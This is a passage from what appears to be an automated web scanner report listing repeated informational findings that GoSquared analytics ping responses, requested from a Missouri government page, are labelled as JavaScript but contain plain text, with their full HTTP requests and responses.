Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:52:10 GMT
Expires: Tue, 05 Apr 2011 11:52:10
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.43. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3157538343220949/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.3157538343220949/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.3157538343220949/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:24:30 GMT
Expires: Tue, 05 Apr 2011 11:24:30
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.44. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3249114565551281/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.3249114565551281/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.3249114565551281/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:23:56 GMT
Expires: Tue, 05 Apr 2011 11:23:56
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.45. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.33584522688761353/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.33584522688761353/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.33584522688761353/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:40:15 GMT
Expires: Tue, 05 Apr 2011 11:40:15
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.46. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3467109438497573/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.3467109438497573/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.3467109438497573/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:54:55 GMT
Expires: Tue, 05 Apr 2011 11:54:55
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.47. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3481709277257323/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.3481709277257323/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.3481709277257323/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:39:59 GMT
Expires: Tue, 05 Apr 2011 11:39:59
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.48. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3624314337503165/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.3624314337503165/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.3624314337503165/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:45:31 GMT
Expires: Tue, 05 Apr 2011 11:45:31
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.49. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38390326127409935/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.38390326127409935/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.38390326127409935/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:39:42 GMT
Expires: Tue, 05 Apr 2011 11:39:42
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.50. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38600696669891477/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.38600696669891477/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.38600696669891477/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:27:32 GMT
Expires: Tue, 05 Apr 2011 11:27:32
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.51. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.40151602448895574/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.40151602448895574/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.40151602448895574/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:45:15 GMT
Expires: Tue, 05 Apr 2011 11:45:15
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.52. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4050266451667994/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.4050266451667994/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.4050266451667994/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:44:41 GMT
Expires: Tue, 05 Apr 2011 11:44:41
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.53. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4068455633241683/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.4068455633241683/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.4068455633241683/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:40:49 GMT
Expires: Tue, 05 Apr 2011 11:40:49
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.54. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4138688885141164/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.4138688885141164/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.4138688885141164/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:50:14 GMT
Expires: Tue, 05 Apr 2011 11:50:14
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.55. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.41853372333571315/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.41853372333571315/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.41853372333571315/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:48:01 GMT
Expires: Tue, 05 Apr 2011 11:48:01
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.56. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.429519847035408/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.429519847035408/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.429519847035408/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:57:26 GMT
Expires: Tue, 05 Apr 2011 11:57:26
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.57. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4363963413052261/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.4363963413052261/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.4363963413052261/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:24:46 GMT
Expires: Tue, 05 Apr 2011 11:24:46
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.58. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.44046534434892237/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.44046534434892237/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.44046534434892237/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:52:27 GMT
Expires: Tue, 05 Apr 2011 11:52:27
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.59. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4425783231854439/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.4425783231854439/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.4425783231854439/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:46:22 GMT
Expires: Tue, 05 Apr 2011 11:46:22
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.60. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4540047354530543/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.4540047354530543/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.4540047354530543/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:32:31 GMT
Expires: Tue, 05 Apr 2011 11:32:31
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.61. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.45804641279391944/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.45804641279391944/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.45804641279391944/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:54:22 GMT
Expires: Tue, 05 Apr 2011 11:54:22
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.62. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.49180271849036217/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.49180271849036217/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.49180271849036217/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:50:30 GMT
Expires: Tue, 05 Apr 2011 11:50:30
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.63. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.500924386549741/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.500924386549741/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.500924386549741/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:57:59 GMT
Expires: Tue, 05 Apr 2011 11:57:59
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.64. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5069206766784191/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5069206766784191/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5069206766784191/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:39:09 GMT
Expires: Tue, 05 Apr 2011 11:39:09
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.65. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5099691387731582/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5099691387731582/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5099691387731582/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:44:25 GMT
Expires: Tue, 05 Apr 2011 11:44:25
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.66. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5208840556442738/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5208840556442738/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5208840556442738/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:53:49 GMT
Expires: Tue, 05 Apr 2011 11:53:49
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.67. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5211261368822306/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5211261368822306/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5211261368822306/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:40:33 GMT
Expires: Tue, 05 Apr 2011 11:40:33
